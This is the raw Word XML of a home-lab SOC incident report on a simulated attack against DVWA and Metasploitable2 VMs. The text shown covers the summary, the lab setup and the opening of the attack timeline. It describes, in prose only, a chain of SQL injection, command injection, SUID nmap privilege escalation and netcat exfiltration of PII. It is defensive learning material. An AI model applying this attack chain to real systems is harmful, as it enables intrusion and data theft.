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B452" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00260F7B">
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC291D2" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="64"/>
          <w:szCs w:val="64"/>
        </w:rPr>
        <w:t>SOC INCIDENT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3560EB93" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>End-to-End Cyberattack Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A286A" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Home Lab Security Assessment — Offensive Execution + Defensive Analysis</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6039"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260F7B" w14:paraId="05CF4C69" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="6C2D4552" w14:textId="77777777" w:rsidR="00260F7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039" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="1FC93A53" w14:textId="77777777" w:rsidR="00260F7B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60F7B" w14:paraId="7F714D75" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB30BD7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Report Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BDA440B" w14:textId="543D3EAB" w:rsidR="00260F7B" w:rsidRDefault="00F63671">
            <w:r>
              <w:t>Rohan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="5B80DDE3" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38B57E43" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Incident Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25B99474" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>July 24–26, 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="4AECC765" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79CD2CB2" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Report Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F38A3B2" w14:textId="3A3EE418" w:rsidR="00260F7B" w:rsidRDefault="00F63671">
            <w:r>
              <w:t>27/07/2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="318611F6" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78AA3E76" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Incident ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="362B2DBA" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>INC-2026-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="10EEBE83" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6BD897" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67610AF8" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confidential — Lab Simulation Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="4E3CF3C6" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="320F6914" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="143EF4AB" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Kali Linux — 192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="15B49F40" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1360E0DA" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Target Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="069ED095" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DVWA / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Metasploitable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VM — 192.168.100.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="624E3E4F" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D4E19CA" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr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6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4840356C" w14:textId="77777777" w:rsidR="00260F7B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</w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="576F5623" w14:textId="77777777" w:rsidTr="00F63671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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EB940E0" w14:textId="77777777" w:rsidR="00260F7B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039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53FACBF5" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Contained (Lab Environment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65485846" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F7449" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CCDBDB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 xml:space="preserve">This report documents a simulated end-to-end cyberattack conducted in an isolated home lab environment. The purpose was to demonstrate the complete lifecycle of a security incident — from initial reconnaissance through exploitation, privilege escalation, and data exfiltration — and then to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attack from a defensive SOC perspective.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1B110A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>The attacker (Kali Linux, 192.168.100.10) successfully compromised the target machine (192.168.100.20) through a chain of vulnerabilities beginning with SQL injection against a DVWA web application, which led to credential theft. Command injection then provided remote shell access, after which a misconfigured SUID binary (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) was exploited to escalate privileges to root. The attack concluded with simulated exfiltration of sensitive data containing customer PII via a raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection on port 5555.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C69741D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>The entire attack chain — reconnaissance, exploitation, privilege escalation, and data exfiltration — was captured in a packet capture file (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lab_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capture.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F63671">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) and confirmed across three independent evidence sources: Wireshark traffic analysis, web server access logs, and system authentication logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24986151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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No existing security control detected or prevented any stage of this attack, highlighting critical gaps in network monitoring, input validation, system hardening, and data loss prevention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DA1FBE" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F008228" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA483FF" w14:textId="77777777" w:rsidR="00F63671" w:rsidRDefault="00F63671">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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6039"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260F7B" w14:paraId="04056B98" w14:textId="77777777" w:rsidTr="00F63671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019" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="118E12F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039" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="127A9727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260F7B" w14:paraId="5224D234" w14:textId="77777777" w:rsidTr="00F63671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019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EFD5114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Attacker Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="371C4236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Kali Linux (192.168.100.10) — VirtualBox VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="7ED2A88D" w14:textId="77777777" w:rsidTr="00F63671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019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A104C2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Target Machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61406795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DVWA + Metasploitable2 (192.168.100.20) — VirtualBox VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="3A3AE270" w14:textId="77777777" w:rsidTr="00F63671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019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="729918DD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6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="765BC8FF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Isolated internal virtual network — no internet exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="4336016D" w14:textId="77777777" w:rsidTr="00F63671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019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="000DA9A6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Traffic Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2731F94F" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tcpdump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> capturing all traffic → </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lab_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>capture.pcap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="0CAE0DAB" w14:textId="77777777" w:rsidTr="00F6367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3019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E17CC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Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A7CB164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 xml:space="preserve">Nmap, Burp Suite, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQLMap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671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63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671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63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>netcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="6EF0993E" w14:textId="77777777" w:rsidTr="00F63671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019" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C4EFF6A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DVWA Security Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA93204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  <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Low (SQL Injection), Low (Command Execution)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F33DEE7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB15AB" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Attack Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727AFB1D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>The following timeline was reconstructed by correlating three independent evidence sources: Wireshark packet capture (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lab_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>capture.pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>), web server access logs (access.log.1), and system authentication logs (auth.log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73007800" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00260F7B">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10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1881"/>
        <w:gridCol w:w="1672"/>
        <w:gridCol w:w="4181"/>
        <w:gridCol w:w="1881"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260F7B" w14:paraId="51A8A3BE" w14:textId="77777777" w:rsidTr="00F63671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627" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="74088A90" w14:textId="77777777" w:rsidR="00260F7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81" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="06B8AC2E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Date &amp; Time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="75B2098B" w14:textId="77777777" w:rsidR="00260F7B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IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="4A251979" w14:textId="77777777" w:rsidR="00260F7B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81" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="0C4F1A17" w14:textId="77777777" w:rsidR="00260F7B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 Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="3033449B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4D9EA37D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59F2C8BA" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-24 18:52:47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520B6B00" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B14BA44" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nmap port scan initiated — SYN packets sent to all ports on target</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="053A7F53" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (SYN filter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="0CAC79CD" w14:textId="77777777" w:rsidTr="00F63671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627" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39DBC3A7" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EEDB33D" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-24 18:52:53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4001EF45" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2545082E" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Nmap scripting engine probed web server — OPTIONS, PROPFIND, robots.txt requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64578594" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Wireshark (HTTP filter) + access.log.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260F7B" w14:paraId="685B8DB2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4FC96AB0" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1881" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0ECB22" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>2026-07-24 18:54:54</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1672" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B93D874" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>192.168.100.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31E3B2C8" w14:textId="77777777" w:rsidR="00260F7B" w:rsidRPr="00F63671" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00F63671">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>DVWA web application accessed — attacker browsed to login page and authenticated</w:t>
            </w:r>
